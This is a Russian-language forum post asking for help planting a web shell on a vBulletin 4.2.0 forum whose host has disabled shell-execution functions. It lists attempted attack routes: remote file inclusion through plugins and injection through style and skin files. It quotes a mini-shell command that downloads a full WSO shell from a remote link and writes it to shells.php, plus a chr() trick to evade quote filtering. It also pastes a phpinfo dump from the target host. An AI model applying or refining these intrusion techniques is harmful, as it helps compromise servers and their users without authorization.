|
Приветствую,уважаемые форумчане.Подскажите,пожал уйста,может кто знает нестандартный способ заливки шелла на форумный движок vbulletin 4.2.0 nulled rus.Дело в том,что все стандартные схемы,которые изложени в сети не подходят для данной версии движка + это vps и отключены функции system и shell execute.
Что я пробовал : Через менеджер плагинов выполнить RFI как описано здесь Через,файл стилей как показано тут или тут Также,пробывал лить через,скины и с помощью различных команд: PHP код: PHP код: PHP код: PHP код: PHP код: Не выполняется,тупо белый экран.Также пробовал этот метод №3 - Что касается "Мини-шелла" Итак, опять же допустим, что вы закачали "мини шелл", но теперь бы вам надо залить нормальный, WSO к примеру. Пробуем: http://host.ru/shell.php?cmd=$url = "Ссылка_на_шелл.txt";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h); Но тут очень часто бывает облом - либо нельзя, чтобы был пробел, либо нельзя, чтобы были кавычки. "Заброшу ка я сервер" - наверное подумали вы.. но нет, конечно, вы правы, чтобы задать тип переменной в php типа string, не мешало бы значение поместить в кавычки, а вот оказывается нет. Достаточно использовать функцию chr(); Эта функция "преобразовывает" ASCII в "обычный текст", таблицу таких символов можно взять тут - http://www.asciitable.com/ И соответственно, получаем код, к примеру (рабочий): Цитата:
PHP Version 5.3.3-7+squeeze19 System Linux vm2785 2.6.32-042stab092.2 #1 SMP Tue Jul 8 10:35:55 MSK 2014 i686 Build Date Feb 18 2014 13:57:17 Directive Local Value Master Value allow_call_time_pass_reference Off Off allow_url_fopen On On allow_url_include Off Off always_populate_raw_post_data Off Off arg_separator.input & & arg_separator.output & & asp_tags Off Off auto_append_file no value no value auto_globals_jit On On auto_prepend_file no value no value browscap no value no value default_charset no value no value default_mimetype text/html text/html define_syslog_variables Off Off disable_classes no value no value disable_functions exec,passthru,shell_exec,system,proc_open,popen exec,passthru,shell_exec,system,proc_open,popen display_errors Off Off display_startup_errors Off Off doc_root no value no value docref_ext no value no value docref_root no value no value enable_dl Off Off error_append_string no value no value error_log no value no value error_prepend_string no value no value error_reporting 30711 22527 exit_on_timeout Off Off expose_php On On extension_dir /usr/lib/php5/20090626+lfs /usr/lib/php5/20090626+lfs file_uploads On On highlight.bg #FFFFFF #FFFFFF highlight.comment #FF8000 #FF8000 highlight.default #0000BB #0000BB highlight.html #000000 #000000 highlight.keyword #007700 #007700 highlight.string #DD0000 #DD0000 html_errors Off Off ignore_repeated_errors Off Off ignore_repeated_source Off Off ignore_user_abort Off Off implicit_flush Off Off include_path .:/usr/share/php:/usr/share/pear .:/usr/share/php:/usr/share/pear log_errors On On log_errors_max_len 1024 1024 magic_quotes_gpc Off Off magic_quotes_runtime Off Off magic_quotes_sybase Off Off mail.add_x_header On On mail.force_extra_parameters no value no value mail.log no value no value max_execution_time 30 30 max_file_uploads 20 20 max_input_nesting_level 64 64 max_input_time 60 60 max_input_vars 1000 1000 удаленная загрузка шелла не получилась через модули и плагины работает,только phpinfo. Может,кто что-то подскажет,буду очень благодарен. Ребята,почти любая команда выдает былый экран что делать,я уже и get_content перепробовал... |
| Время: 04:49 |